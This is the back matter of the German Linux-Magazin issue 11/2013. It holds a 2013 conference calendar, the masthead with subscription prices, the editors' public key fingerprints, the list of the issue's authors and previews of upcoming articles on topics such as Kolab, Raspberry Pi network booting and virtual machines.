Thomas Krenn AG http://​www.thomas-krenn.com 116
Uni Hamburg http://​www.uni-hamburg.de 111
Webtropia http://​www.webtropia.com​ 23, 37
Einem Teil dieser Ausgabe liegt eine Beilage der Firma 1&1 Internet AG (http://​www.
einsundeins.de) bei. Wir bitten unsere Leser um freundliche Beachtung.
Veranstaltungen
08.-10.10.2013
Data Modeling Zone America
Baltimore, MD
http://www.datamodelingzone.com
21.-23.10.2013
LinuxCon Europe 2013
Edinburgh, UK
http://events.linuxfoundation.org/events/linuxconeurope
08.-10.11.2013
FSCONS 2013
Göteborg, Sweden
https://fscons.org/2013/
11.-13.10.2013
Ubucon 2013
69115 Heidelberg, Deutschland
http://www.ubucon.de
14.-19.10.2013
PyCon.DE 2013
Köln, Deutschland
https://2013.de.pycon.org
16.-18.10.2013
Medientage München
München, Deutschland
http://www.medientage.de
18.-20.10.2013
Proyecto H
Cuernavaca, México
http://www.hackingmexico.mx/proyectoh/
21.-23.10.2013
CloudOpen Europe 2013
Edinburgh, UK
http://events.linuxfoundation.org/events/cloudopeneurope
22.-23.10.2013
Apps World
London, UK
http://www.apps-world.net/europe
24.-25.10.2013
Embedded Linux Conference Europe 2013
Edinburgh, UK
http://events.linuxfoundation.org/events/embeddedlinux-conference-europe
28.-30.10.2013
JAXConf London 2013 with Big Data Con
London, UK
http://jaxlondon.com
02.-03.11.2013
Blendiberia 2013
Málaga, Spain
http://3dschool.ihman.com/informacionblendiberia-2013/
03.-08.11.2013
USENIX LISA ’13
Washington, D.C.
https://www.usenix.org/conference/lisa13
08.11.2013
Deutsche PostgreSQL Konferenz 2013
Oberhausen, Deutschland
http://2013.pgconf.de
09.-10.11.2013
OpenRheinRuhr
Oberhausen, Deutschland
http://openrheinruhr.de
15.-16.11.2013
7. Linux-Informationstage Oldenburg
Oldenburg, Deutschland
http://lit-ol.de
17.-22.11.2013
SC13
Denver, CO, USA
http://sc13.supercomputing.org
22.-24.11.2013
PyconES 2013
Madrid, Spain
http://2013.es.pycon.org
23.11.2013
14. Vorarlberger LinuxDay
Dornbirn, Österreich
http://www.linuxday.at

Impressum
Linux-Magazin eine Publikation der Linux New Media, einem
Geschäftsbereich der Medialinx AG
Redaktionsanschrift Putzbrunner Str. 71
81739 München
Tel.: 089/993411-0
Fax: 089/993411-99 oder -96
Internet
www.linux-magazin.de
E-Mail
redaktion@linux-magazin.de
Geschäftsleitung
Chefredakteur
stv. Chefredakteure
Redaktionsltg. Online
Brian Osborn (Vorstand), bosborn@medialinx-gruppe.de
Hermann Plank (Vorstand), hplank@medialinx-gruppe.de
Jan Kleinert (V.i.S.d.P.), jkleinert@linux-magazin.de (jk)
Markus Feilner, mfeilner@linux-magazin.de (mfe)
Mathias Huber, mhuber@linux-magazin.de (mhu)
Mathias Huber, mhuber@linux-magazin.de (mhu)
Print- und Onlineredaktion
Aktuell, Forum, Software, Kristian Kissling, kkissling@linux-magazin.de (kki)
Programmierung Mathias Huber, mhuber@linux-magazin.de (mhu)
Sysadmin, Know-how Markus Feilner, mfeilner@linux-magazin.de (mfe)
Ständige Mitarbeiter Fred Andresen, Zack Brown, Mela Eckenfels, Heike Jurzik (hej),
Charly Kühnast, Martin Loschwitz, Michael Schilli, Tim
Schürmann, Mark Vogelsberger, Uwe Vollbracht, Arnold
Zimprich (azi)
Schlussredaktion
Grafik
Bildnachweis
DELUG-DVD
Chefredaktionen
International
Produktion
Onlineshop
Abo-Infoseite
Abonnenten-Service
ISSN 1432 – 640 X
Jürgen Manthey
Mike Gajer, Judith Erb (Art Director)
xhoch4, München (Titel-Illustration)
123RF.com, Fotolia.de, Photocase.com, Pixelio.de und andere
Thomas Leichtenstern, tleichtenstern@linux-magazin.de (tle)
Linux Magazine International
Joe Casad (jcasad@linux-magazine.com)
Linux Magazine Poland
Artur Skura (askura@linux-magazine.pl)
Linux Magazine Spain
Paul C. Brown (pbrown@linux-magazine.es)
Linux Magazine Brasil
Rafael Peregrino (rperegrino@linuxmagazine.com.br)
Christian Ullrich, cullrich@linux-magazin.de
www.medialinx-shop.de
www.linux-magazin.de/Produkte
A.B.O. Verlagservice GmbH
Gudrun Blanz (Teamleitung)
abo@medialinx-gruppe.de
Tel.: +49-(0)7131-2707-274
Fax: +49-(0)7131-2707-78-601
Preise Print Deutschland Österreich Schweiz Ausland EU
No-Media-Ausgabe 4 6,40 4 7,05 Sfr 12,80 (siehe Titel)
DELUG-DVD-Ausgabe 4 8,50 4 9,35 Sfr 17,— (siehe Titel)
Jahres-DVD (Einzelpreis) 4 14,95 4 14,95 Sfr 18,90 4 14,95
Jahres-DVD (zum Abo 1 ) 4 6,70 4 6,70 Sfr 8,50 4 6,70
Mini-Abo (3 Ausgaben) 4 3,— 4 3,— Sfr 4,50 4 3,—
Jahresabo No Media 4 65,20 4 71,90 Sfr 107,50 4 84,60
Jahresabo DELUG-DVD 4 87,90 4 96,90 Sfr 142,80 4 99,90
Preise Digital Deutschland Österreich Schweiz Ausland EU
Heft-PDF Einzelausgabe 4 6,40 4 6,40 Sfr 8,30 4 6,40
DigiSub (12 Ausgaben) 4 65,20 4 65,20 Sfr 84,80 4 65,20
DigiSub (zum Printabo) 4 12,— 4 12,— Sfr 12,— 4 12,—
HTML-Archiv (zum Abo 1 ) 4 12,— 4 12,— Sfr 12,— 4 12,—
Preise Kombiabos Deutschland Österreich Schweiz Ausland EU
Mega-Kombi-Abo 2 4 143,40 4 163,90 Sfr 199,90 4 173,90
Profi-Abo 3 4 136,60 4 151,70 Sfr 168,90 4 165,70
1
nur erhältlich in Verbindung mit einem Jahresabo Print oder Digital
2
mit LinuxUser-Abo (DVD) und beiden Jahres-DVDs, inkl. DELUG-Mitgliedschaft (monatl.
DELUG-DVD)
3
mit ADMIN-Abo und beiden Jahres-DVDs
Schüler- und Studentenermäßigung: 20 Prozent gegen Vorlage eines Schülerausweises
oder einer aktuellen Immatrikulationsbescheinigung. Der aktuelle Nachweis ist bei
Verlän gerung neu zu erbringen. Andere Abo-Formen, Ermäßigungen im Ausland etc.
auf Anfrage.
Adressänderungen bitte umgehend mitteilen, da Nachsendeaufträge bei der Post nicht
für Zeitschriften gelten.
Pressemitteilungen
Marketing und Vertrieb
Mediaberatung D, A, CH
presse-info@linux-magazin.de
Petra Jaser, pjaser@linux-magazin.de
Tel.: +49 (0)89 / 99 34 11 – 24
Fax: +49 (0)89 / 99 34 11 – 99
Michael Seiter, mseiter@linux-magazin.de
Tel.: +49 (0)89 / 99 34 11 – 23
Mediaberatung USA Ann Jesse, ajesse@linux-magazine.com
und weitere Länder Tel.: +1 785 841 8834
Darrah Buren, dburen@linux-magazine.com
Tel.:+1 785 856 3082
Pressevertrieb
Druck
Es gilt die Anzeigen-Preisliste vom 01.01.2013.
MZV Moderner Zeitschriften Vertrieb GmbH & Co. KG
Ohmstraße 1, 85716 Unterschleißheim
Tel.: 089/31906-0, Fax: 089/31906-113
Vogel Druck GmbH, 97204 Höchberg
Der Begriff Unix wird in dieser Schreibweise als generelle Bezeichnung für die Unixähnlichen
Betriebssysteme verschiedener Hersteller benutzt. Linux ist eingetragenes
Marken zeichen von Linus Torvalds und wird in unserem Markennamen mit seiner
Erlaubnis verwendet.
Eine Haftung für die Richtigkeit von Veröffentlichungen kann trotz sorgfältiger Prüfung
durch die Redaktion vom Verlag nicht übernommen werden. Mit der Einsendung von
Manus kripten gibt der Verfasser seine Zustimmung zum Abdruck. Für unverlangt
eingesandte Manuskripte kann keine Haftung übernommen werden.
Das Exklusiv- und Verfügungsrecht für angenommene Manuskripte liegt beim Verlag. Es
darf kein Teil des Inhalts ohne ausdrückliche schriftliche Genehmigung des Verlags in
irgendeiner Form vervielfältigt oder verbreitet werden.
Copyright © 1994 – 2013 Medialinx AG
Impressum 11/2013
Service
www.linux-magazin.de
113
Krypto-Info
GnuPG-Schlüssel der Linux-Magazin-Redaktion:
pub 1024D/44F0F2B3 2000-05-08 Redaktion Linux-Magazin
Key fingerprint = C60B 1C94 316B 7F38 E8CC E1C1 8EA6 1F22 44F0 F2B3
Public-Key der DFN-PCA:
pub 2048R/7282B245 2007-12-12,
DFN-PGP-PCA, CERTIFICATION ONLY KEY (DFN-PGP-Policy: 2008-2009)
Key fingerprint = 39 D9 D7 7F 98 A8 F1 1B 26 6B D8 F2 EE 8F BB 5A
PGP-Zertifikat der DFN-User-CA:
pub 2048R/6362BE8B (2007-12-12),
DFN-PGP-User-CA, CERTIFICATION ONLY KEY (DFN-PGP-Policy: 2008-2009)
Key fingerprint = 30 96 47 77 58 48 22 C5 89 2A 85 19 9A D1 D4 06
Root-Zertifikat der CAcert:
Subject: O=Root CA, OU=http://www.cacert.org, CN=CA Cert Signing Authority/
Email=support@cacert.org
SHA1 Fingerprint=13:5C:EC:36:F4:9C:B8:E9:3B:1A:B2:70:CD:80:88:46:76:CE:8F:33
MD5 Fingerprint=A6:1B:37:5E:39:0D:9C:36:54:EE:BD:20:31:46:1F:6B
GPG-Schlüssel der CAcert:
pub 1024D/​65D0FD58 2003-07-11 [expires: 2033-07-03]
Key fingerprint = A31D 4F81 EF4E BD07 B456 FA04 D2BB 0D01 65D0 FD58
uid CA Cert Signing Authority (Root CA)
Autoren dieser Ausgabe
Bernhard Bablok Tux liest 82
Zack Brown Zacks Kernel-News 18
Rainer Grimm Tux liest 82
Gijs Hillenius Abgehängt 78
Dr. Harald Jele Alles ausgezeichnet 52
Jan Krutisch Flexible Unterlage 34
Christoph Kuhr Multimedia-Brücke 88
Charly Kühnast Slow Food 67
Martin Loschwitz Auferstanden 84
Nils Magnus Action am Haken 74
Hans-Peter Merkel Flüchtige Spuren 68
Sven Schannak Django Unchained 39
Michael Schilli Catwalk Orange 100
Tim Schürmann Schnelles war keiner 22
Tim Schürmann Einsteigerfreundlich 94
Mark Vogelsberger Schwacher Zufall 92
Uwe Vollbracht Tooltipps 60
Carsten Zerbst Blühender Content-Baum 28

Service
www.linux-magazin.de Vorschau 02/2013 12/2013 01/2013 11/2013
114
Vorschau
12/2013 Dachzeile
Kolab + Sabre = I-Rony
© tiero, 123RF.com
MAGAZIN
Überschrift
Unter dem sinnigen Namen I-Rony versorgt Kolab mit der aktuellen
Betaversion nun auch Clients mit Kontakten und Terminen,
denen Active Sync, Sync ML oder das Kolab-XML-Format
nichts nützt. Betroffen sind Thunderbird, Evolution, Mac-OS-
Ical und andere Clients. Die Kolab-Entwickler haben nämlich
Sabre Dav integriert, einen Caldav- und Carddav-Server.
U-Boot mit Kern-Technik
Raus aus dem Hamsterrad!
Sind IT-Administratoren tatsächlich Nerds, die zu komplexer
sozialer Interaktion kaum fähig sind? Die Erfahrung lehrt: nein!
Doch die meisten IT-Abteilungen sind genau so organisiert, als
ob dort Sonderlinge ihre Spezialgebiete (Storage, Mail, Netzwerk,
Oracle, SAP, …) autistisch beackern. Dass solche historisch
gewachsenen Abteilungsstrukturen „bewährt“ genannt
werden, bedeutet nicht, dass sie effektiv und effizient sind.
Das nächste Magazin recherchiert in Theorie und Praxis neue
Organisationsformen, anhand derer Admins wiederkehrende
und einmalige Arbeiten intelligenter aufteilen, um Ressourcen
zu gewinnen, die ihnen wiederum die kreative Weiterentwicklung
ihrer IT ermöglichen.
Wer für den Raspberry Pi entwickelt, hat das alte „SD-Karte
rein“-„SD-Karte raus“-Spiel bald satt. Mit dem Bootloader U-
Boot, einem TFTP-Server, angepasstem Kernel und Userland
sowie etwas Konfiguration bootet das Board vom Netzwerk.
C++11: Performance matters
Dass Geschwindigkeit zählt ist ein ebenso einfaches wie wichtiges
Prinzip von C++. Da trifft es sich gut, dass die neueste
Ausgabe der Programmiersprache Dictionaries anbietet, auf die
Entwickler über einen Schlüssel in konstanter Zeit zugreifen
dürfen. Wie das geht? Linux-Magazin 12 matters.
Die Ausgabe 12/2013
erscheint am 7. November 2013
© Mart1n, sxc.hu
Vorschau
auf 11/2013
Die nächste Ausgabe erscheint am 17.10.2013
Virtuelle Maschinen im Griff
Wer Software testet oder eine sichere Umgebung braucht,
kommt um den Einsatz einer virtuellen Maschine kaum
he rum. Aktuelle Hardware bringt in der Regel die notwendige
Power mit, um Ins tanzen sinnvoll zu betreiben.
Allerdings gibt es beim Setup und bei der Auswahl der Host-
Software einiges zu beachten, beispielsweise wenn der Zugriff
auf Shares oder das Durchschleifen von Hardware-Komponenten
reibungslos klappen soll. Damit Sie keine Bauchlandung
erleiden, hilft der kommende Schwerpunkt mit einem Überblick
über aktuelle Techniken.
Uberwriter
Der Autor genießt das Privileg, den Blick aus dem Fenster als
Arbeit verbuchen zu dürfen. Starrt er jedoch ins (PC-)Fenster,
wünscht er möglichst wenig Störendes. Hier hilft Uberwriter,
der ein ablenkungs freies Schreiben von Texten erlaubt.
Buffalo WZR-HP-AG300N
Im Prinzip handelt es sich beim Dualband-WLAN-Router von
Buffalo schon um eine eierlegende Wollmilchsau. Wem die
Unzahl an Funktionen nicht reicht, der nutzt die offene Firmware
DD-WRT als Grundlage für eigene Experimente.